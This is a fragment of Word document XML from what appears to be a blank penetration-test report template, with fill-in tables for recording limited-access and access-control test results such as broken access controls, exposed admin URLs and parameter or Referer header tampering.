          <w:p w14:paraId="7053A363" w14:textId="28812768" w:rsidR="00035E12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0F62E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Yes/No, </w:t>
            </w:r>
            <w:r w:rsidR="00F92BFD" w:rsidRPr="00F92BF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Unauthorized Data Access if detected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3AFFA0F" w14:textId="77777777" w:rsidR="00035E12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118FD46" w14:textId="77777777" w:rsidR="00035E12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6B92884" w14:textId="77777777" w:rsidR="00035E12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E51B70" w14:paraId="2654C165" w14:textId="77777777" w:rsidTr="00541B43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6A3DFAF9" w14:textId="5B2F3833" w:rsidR="00E51B70" w:rsidRPr="00F92BFD" w:rsidRDefault="00E51B70" w:rsidP="00541B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51B70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Exploit Paths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Found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C323D36" w14:textId="77777777" w:rsidR="00E51B70" w:rsidRDefault="00E51B70" w:rsidP="00E51B7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3276E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Yes/No, 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Give Details]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="563E9553" w14:textId="77777777" w:rsidR="00E51B70" w:rsidRDefault="00E51B70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A93017D" w14:textId="77777777" w:rsidR="00E51B70" w:rsidRDefault="00E51B70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6D2214F" w14:textId="77777777" w:rsidR="00E51B70" w:rsidRDefault="00E51B70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035E12" w14:paraId="555BB146" w14:textId="77777777" w:rsidTr="00541B43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7104D4B5" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00531388" w:rsidRDefault="00035E12" w:rsidP="00541B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B015D0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="616114AB" w14:textId="77777777" w:rsidR="00035E12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F52B6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Risk Details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462DA22" w14:textId="77777777" w:rsidR="00035E12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F57276A" w14:textId="77777777" w:rsidR="00035E12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D8FD7EA" w14:textId="77777777" w:rsidR="00035E12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25AEDA5" w14:textId="77777777" w:rsidR="00035E12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035E12" w:rsidRPr="00A02B04" w14:paraId="5255DE01" w14:textId="77777777" w:rsidTr="00541B43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39ACBE92" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00541B4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02B04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525" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3317AF59" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00035E12">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="68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EAEA7AC" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00035E12">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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D63501E" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00035E12">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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605788C" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00035E12">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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AEE7131" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12" w:rsidP="00035E12">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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87958F1" w14:textId="77777777" w:rsidR="00035E12" w:rsidRPr="00A02B04" w:rsidRDefault="00035E12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3C1397CA" w14:textId="77777777" w:rsidR="00452A45" w:rsidRPr="00A51A96" w:rsidRDefault="00452A45" w:rsidP="00452A45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2A45" w14:paraId="6E988484" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B307A2" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D38B73B" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C111FE6" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="029D1F81" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="174D2B27" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E18883E" w14:textId="77777777" w:rsidR="007F243C" w:rsidRDefault="007F243C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78018D59" w14:textId="77777777" w:rsidR="007F243C" w:rsidRDefault="007F243C" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C1B94A2" w14:textId="77777777" w:rsidR="00452A45" w:rsidRDefault="00452A45" w:rsidP="000947B4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452A45" w:rsidRPr="00A51A96" w14:paraId="136B8D66" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="409AF310" w14:textId="3E80EF06" w:rsidR="00452A45" w:rsidRPr="003C713F" w:rsidRDefault="00452A45" w:rsidP="00725128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4.8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A07C33" w:rsidRPr="00A07C33">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test with Limited Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1877A252" w14:textId="77777777" w:rsidR="00452A45" w:rsidRPr="009F5BA3" w:rsidRDefault="00452A45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2F7B0E" w:rsidRPr="002F7B0E" w14:paraId="10DD3D5F" w14:textId="77777777" w:rsidTr="009F5BA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37046EF" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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F7B0E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555DF718" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="6ED9F22D" w14:textId="77777777" w:rsidTr="009F5BA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2881D56" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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F7B0E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0ADA2C16" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E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40932" w:rsidRPr="002F7B0E" w14:paraId="639A1881" w14:textId="77777777" w:rsidTr="009F5BA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2E25A45" w14:textId="284E3E50" w:rsidR="00F40932" w:rsidRPr="002F7B0E" w:rsidRDefault="00F40932" w:rsidP="009F5B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40932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Target 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Web </w:t>
            </w:r>
            <w:r w:rsidRPr="00F40932">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40ADB8DF" w14:textId="77777777" w:rsidR="00F40932" w:rsidRPr="002F7B0E" w:rsidRDefault="00F40932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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="17DBCB8C" w14:textId="77777777" w:rsidTr="009F5BA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A2C8C4D" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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F7B0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Identifiers Associated w</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7B0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>ith Other Users’ Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A0F4BCD" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="4FFAB28D" w14:textId="77777777" w:rsidTr="009F5BA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61C65B1" w14:textId="35DF1F56" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="00EE7BBA" w:rsidP="009F5B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EE7BBA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Broken Access Controls Identified?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06F87895" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRDefault="00EE7BBA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EE7BB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[*Yes/No, Details on Exploitable Endpoints]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A9BC5BC" w14:textId="77777777" w:rsidR="00EE7BBA" w:rsidRDefault="00EE7BBA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A761B1A" w14:textId="2DFDEB7C" w:rsidR="00EE7BBA" w:rsidRPr="002F7B0E" w:rsidRDefault="00EE7BBA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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="13ADAD2B" w14:textId="77777777" w:rsidTr="009F5BA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FA09999" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002F7B0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application Mapping that Uses a Low-</w:t>
            </w:r>
            <w:r w:rsidRPr="002F7B0E">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Privileged Account</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1957A4D9" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRDefault="002F7B0E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7FBB5E3" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRDefault="009F5BA3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41607DB" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRDefault="009F5BA3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F315C46" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRPr="002F7B0E" w:rsidRDefault="009F5BA3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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="5A0E8821" w14:textId="77777777" w:rsidTr="009F5BA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8D905E5" w14:textId="075A6EC0" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="001041EF" w:rsidP="009F5B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Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001041EF">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Admin Interfaces or Sensitive URLs Discovered?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B9D8A27" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRDefault="001041EF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930FF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930FF3" w:rsidRPr="00930FF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List if Found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF027C1" w14:textId="77777777" w:rsidR="00930FF3" w:rsidRDefault="00930FF3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E029597" w14:textId="77777777" w:rsidR="00930FF3" w:rsidRDefault="00930FF3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8C3C94F" w14:textId="0486B0D6" w:rsidR="00930FF3" w:rsidRPr="002F7B0E" w:rsidRDefault="00930FF3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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="6062BC7E" w14:textId="77777777" w:rsidTr="009F5BA3">
        <w:trPr>
          <w:trHeight w:val="908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A894F2C" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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F7B0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Results for Test with Limited Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FD163AA" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRDefault="002F7B0E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4DFF847" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRDefault="009F5BA3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00E747F" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRDefault="009F5BA3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0AF4E7D" w14:textId="77777777" w:rsidR="009F5BA3" w:rsidRPr="002F7B0E" w:rsidRDefault="009F5BA3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22C35" w:rsidRPr="002F7B0E" w14:paraId="6AD78459" w14:textId="77777777" w:rsidTr="009F5BA3">
        <w:trPr>
          <w:trHeight w:val="908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EC5DF88" w14:textId="2ADDB945" w:rsidR="00622C35" w:rsidRPr="002F7B0E" w:rsidRDefault="00622C35" w:rsidP="009F5B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622C3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Hidden Functions Revealed in HTML Source Code?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10957CE5" w14:textId="77777777" w:rsidR="00622C35" w:rsidRPr="009561ED" w:rsidRDefault="00622C35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9561E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9561ED" w:rsidRPr="009561E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Details of Hidden Elements Found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A86CFC2" w14:textId="77777777" w:rsidR="009561ED" w:rsidRDefault="009561ED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16B510B" w14:textId="77777777" w:rsidR="009561ED" w:rsidRDefault="009561ED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81D65D0" w14:textId="19241A9A" w:rsidR="009561ED" w:rsidRPr="002F7B0E" w:rsidRDefault="009561ED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76707" w:rsidRPr="002F7B0E" w14:paraId="600711F0" w14:textId="77777777" w:rsidTr="009F5BA3">
        <w:trPr>
          <w:trHeight w:val="908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F9BC66F" w14:textId="587ADA28" w:rsidR="00D76707" w:rsidRPr="00622C35" w:rsidRDefault="00D76707" w:rsidP="009F5B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D7670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Consistency of Access Controls Across Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7006" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="645C36AF" w14:textId="77777777" w:rsidR="00D76707" w:rsidRDefault="00D76707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E1FF7" w:rsidRPr="00CE1FF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Enforced Properly? Yes/No, Issues Identified</w:t>
            </w:r>
            <w:r w:rsidR="00CE1FF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2EB9892" w14:textId="77777777" w:rsidR="00CE1FF7" w:rsidRDefault="00CE1FF7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6185F26" w14:textId="45124074" w:rsidR="00CE1FF7" w:rsidRPr="009561ED" w:rsidRDefault="00CE1FF7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B4B75" w:rsidRPr="002F7B0E" w14:paraId="700FD917" w14:textId="77777777" w:rsidTr="009F5BA3">
        <w:trPr>
          <w:trHeight w:val="908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A8972DE" w14:textId="01B3FD26" w:rsidR="006B4B75" w:rsidRPr="00D76707" w:rsidRDefault="006B4B75" w:rsidP="009F5B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6B4B7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23D11502" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75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81E2406" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75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301B58F" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75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608862A" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75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F7B0E" w:rsidRPr="002F7B0E" w14:paraId="38F56D76" w14:textId="77777777" w:rsidTr="009F5BA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6E6189F" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="009F5B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F7B0E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044B71D1" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="69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D5A2189" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="69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5C570F7" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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28B98A8" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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06C5893" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6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78EB652" w14:textId="77777777" w:rsidR="002F7B0E" w:rsidRPr="002F7B0E" w:rsidRDefault="002F7B0E" w:rsidP="002F7B0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00D08D65" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRPr="00A51A96" w:rsidRDefault="006B4B75" w:rsidP="006B4B75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B4B75" w14:paraId="4AB4D7BD" w14:textId="77777777" w:rsidTr="00725128">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BCCFE62" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6247D343" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="78809897" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="786ABE3B" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="006F321B" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3210D47F" w14:textId="77777777" w:rsidR="006B4B75" w:rsidRDefault="006B4B75" w:rsidP="00725128">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0D6C01CE" w14:textId="77777777" w:rsidR="00A07C33" w:rsidRDefault="00A07C33" w:rsidP="000947B4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8208A8" w:rsidRPr="00A51A96" w14:paraId="17E18411" w14:textId="77777777" w:rsidTr="001772BF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0F10F05B" w14:textId="0404993D" w:rsidR="008208A8" w:rsidRPr="003C713F" w:rsidRDefault="008208A8" w:rsidP="00725128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4.9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C24E72" w:rsidRPr="00C24E72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Insecure Access Control Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EA55041" w14:textId="77777777" w:rsidR="003D4C14" w:rsidRPr="00200A8A" w:rsidRDefault="003D4C14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98"/>
        <w:gridCol w:w="6862"/>
      </w:tblGrid>
      <w:tr w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w14:paraId="0E95C917" w14:textId="77777777" w:rsidTr="00200A8A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09C47121" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="00200A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Target </w:t>
            </w:r>
            <w:r w:rsidRPr="00B843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5034A474" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="2A0A90DA" w14:textId="77777777" w:rsidTr="00200A8A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23502DC1" w14:textId="29C5A9E4" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="00200A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843A4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Target Web </w:t>
            </w:r>
            <w:r w:rsidR="00C33A0C">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55F81A02" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="276239B3" w14:textId="77777777" w:rsidTr="00200A8A">
        <w:trPr>
          <w:trHeight w:val="1286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7263B1AA" w14:textId="01F0A205" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="00474950" w:rsidP="00200A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74950">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>HTTP Parameter-Based Access Control Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75A3C8FB" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="21AC78F2" w14:textId="77777777" w:rsidTr="00200A8A">
        <w:trPr>
          <w:trHeight w:val="854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7E4C4CE2" w14:textId="5EF65C4F" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="008949EA" w:rsidP="00200A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949EA">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Parameter Modification Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A4117B" w14:textId="3B55E8DC" w:rsidR="006E2ECD" w:rsidRDefault="00CA6A3E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CA6A3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Privileges Escalated? Yes/No, Example if found: admin=true or access=yes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6E8E5BF" w14:textId="77777777" w:rsidR="008949EA" w:rsidRDefault="008949EA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4C7F8F5" w14:textId="77777777" w:rsidR="008949EA" w:rsidRDefault="008949EA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02E7788" w14:textId="77777777" w:rsidR="006A1598" w:rsidRPr="00F10796" w:rsidRDefault="006A1598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E2ECD" w:rsidRPr="00B843A4" w14:paraId="2B5583DA" w14:textId="77777777" w:rsidTr="00200A8A">
        <w:trPr>
          <w:trHeight w:val="854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70A89BE6" w14:textId="4C0FD8D6" w:rsidR="006E2ECD" w:rsidRPr="003773B3" w:rsidRDefault="00FD7E5D" w:rsidP="00200A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D7E5D">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Referer Header Manipulation Tested?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F71CB68" w14:textId="2CE86AD2" w:rsidR="006E2ECD" w:rsidRDefault="00AC3E48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AC3E4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Observed Behavior on Spoofed Admin Requests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B950A35" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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CD3E45D" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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77CA1EF" w14:textId="77777777" w:rsidR="006A1598" w:rsidRDefault="006A1598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FB55A49" w14:textId="77777777" w:rsidR="006A1598" w:rsidRPr="00F10796" w:rsidRDefault="006A1598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E2ECD" w:rsidRPr="00B843A4" w14:paraId="05735158" w14:textId="77777777" w:rsidTr="00200A8A">
        <w:trPr>
          <w:trHeight w:val="854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0AB01A2A" w14:textId="78C0B172" w:rsidR="006E2ECD" w:rsidRPr="00A33027" w:rsidRDefault="00AC3E48" w:rsidP="00200A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C3E48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Other Header-Based Access Control Issues Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20E87A2D" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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A94B6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Details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1A3DDAD" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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67BFAB5" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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D4DC8D1" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRDefault="006E2ECD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C1DFCAD" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00F10796" w:rsidRDefault="006E2ECD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E2ECD" w:rsidRPr="00B843A4" w14:paraId="357C3DEE" w14:textId="77777777" w:rsidTr="00200A8A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23D01D3B" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="00200A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843A4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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01FE1CE8" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="006E2ECD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="70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CA793CD" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="006E2ECD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7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3DDD6B3" w14:textId="77777777" w:rsidR="006E2ECD" w:rsidRPr="00B843A4" w:rsidRDefault="006E2ECD" w:rsidP="006E2ECD">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
